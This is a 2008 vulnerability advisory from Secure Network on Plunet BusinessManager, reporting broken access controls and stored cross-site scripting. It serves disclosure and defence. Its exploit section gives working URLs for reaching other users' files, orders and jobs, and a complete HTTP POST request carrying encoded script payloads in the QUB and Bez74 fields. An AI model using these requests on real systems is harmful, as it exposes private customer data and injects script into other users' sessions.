Secure Network - Security Research Advisory Vuln name: Failure in Access Controls; multiple Stored Cross Site Scripting vulnerabilities. Systems affected: Plunet BusinessManager Systems not affected: Severity: High Local/Remote: Remote Vendor URL: http://www.plunet.de Author(s): Matteo Ignaccolo m.ignaccolo@securenetwork.it - Gabriele Zanoni g.zanoni@securenetwork.it Relates to: Vendor disclosure: 23/09/2008 Vendor acknowledged: Vendor patch release: Public disclosure: 23/12/2008 Advisory number: SN-2008-04 Advisory URL: http://www.securenetwork.it/advisories/ *** SUMMARY *** Plunet BusinessManager is a powerful software for traslation companies, that offers on a single platform a solution to handle customers, traslators, document management, data, order management e processing. Since Plunet BusinessManager suffers of incorrect validation of some input forms, Stored Cross Site Scripting attacks are allowed. Moreover customers and traslators can access data and file not related to them. *** VULNERABILITY DETAILS *** The application fails to perform a correct access control to data and file. Any user (Customers and Traslators) colud retrive and alter data and file not related to him. Also, an user could be easily enumerate all Company customers. The application fails to validate QUB and Bez74 parameters, so stored Cross Site Scripting attacks are possible. *** EXPLOIT *** An authenticated Customer could use the following URL to access to other Customers private area. http://domain/pagesUTF8/Sys_DirAnzeige.jsp?AnzeigeText=&Pfad=/Customer/ An authenticated Traslator could use the following URL to access Orders not related to him http://domain/pagesUTF8/Sys_DirAnzeige.jsp?AnzeigeText=/PRM&Pfad=/ORDER/ C-00042/PRM An authenticated traslator could use the following URL to access to Jobs not related to him http://domain/pagesUTF8/auftrag_job.jsp?OSG05=1944&anchor=AJob31944 surf jobs Stored Cross Site Scripting POST /pagesUTF8/auftrag_allgemeinauftrag.jsp HTTP/1.1 Host: or IP User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080718 Ubuntu/8.04 (hardy) Firefox/2.0.0.16 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Proxy-Connection: keep-alive Referer: http:///pagesUTF8/auftrag_allgemeinauftrag.jsp Cookie: JSESSIONID=0B1347DFFD031E6BC1944C381A31293D Content-Type: application/x-www-form-urlencoded Content-Length: 1085 TokenUAID=42&QUK=1449&QUKA=*&QUKANSCH=820&QUKLIEFANSCH=820&QUZ=sample& VorlageID=3&QU02=1-&QUL=sample&QUB=%22%3E%3Cscript%3Ealert%28%22XSS2%22%29 %3B%3C%2Fscript%3E&QUG=sample&OSPK01=141&OSPK02=0&OSSK05=&OSSK09=1&PJ12=14 &DATAUFTT=07&DATAUFMM=01&DATAUFJJJJ=2008&DATLIEFTT=24&DATLIEFMM=01& DATLIEFJJJJ=2008&DATLIEFHH=&DATLIEFMN=&PJ13=& Bez74=%22%3E%3Cscript%3Ealert%28%22XSS4%22%29%3B%3C%2Fscript%3E& LDate74TT=24&LDate74MM=01&LDate74JJJJ=2008&LDate74HH=13& LDate74MN=00&BOXP74=4&REA01774=59&REA01874=sample& OutPE0174=0&OutPAP74=8385&Bem74=sample&REA001=&REA010=&REA007=1&REA008=2& REA011=0&REA013=0&REA015=0&LEISTung=sample&LangFlag=&exit=&SelectTab= &ContentBox=&OpenContentBox=&LoginPressed=false&SaveButton=true& CheckXYZ=Send&yOffsetScroll=0 *** FIX INFORMATION *** No patch is currently available. *** WORKAROUNDS *** No workaround is available, but some application firewalls and IPS can be reconfigured to thwart the attack. ********************* *** LEGAL NOTICES *** ********************* Secure Network (www.securenetwork.it) is an information security company, which provides consulting and training services, and engages in security research and development. We are committed to open, full disclosure of vulnerabilities, cooperating whenever possible with software developers for properly handling disclosure. This advisory is copyright 2008 Secure Network S.r.l. Permission is hereby granted for the redistribution of this alert, provided that it is not altered except by reformatting it, and that due credit is given. It may not be edited in any way without the express consent of Secure Network S.r.l. Permission is explicitly given for insertion in vulnerability databases and similars, provided that due credit is given to Secure Network. The information in the advisory is believed to be accurate at the time of publishing based on currently available information. This information is provided as-is, as a free service to the community by Secure Network research staff. There are no warranties with regard to this information. Secure Network does not accept any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. If you have any comments or inquiries, or any issue with what is reported in this advisory, please inform us as soon as possible. E-mail: securenetwork@securenetwork.it GPG/PGP key: http://www.securenetwork.it/pgpkeys/Secure%20Network.asc Phone: +39 02 24 12 67 88 -- Dott. Ing. Matteo Ignaccolo Secure Network S.r.l. Via Venezia, 23 - 20099 Sesto San Giovanni (MI) - Italia Tel: +39 02.24126788 email: m.ignaccolo@securenetwork.it web: www.securenetwork.it -- Dott. Ing. Matteo Ignaccolo Secure Network S.r.l. Via Venezia, 23 - 20099 Sesto San Giovanni (MI) - Italia Tel: +39 02.24126788 email: m.ignaccolo@securenetwork.it web: www.securenetwork.it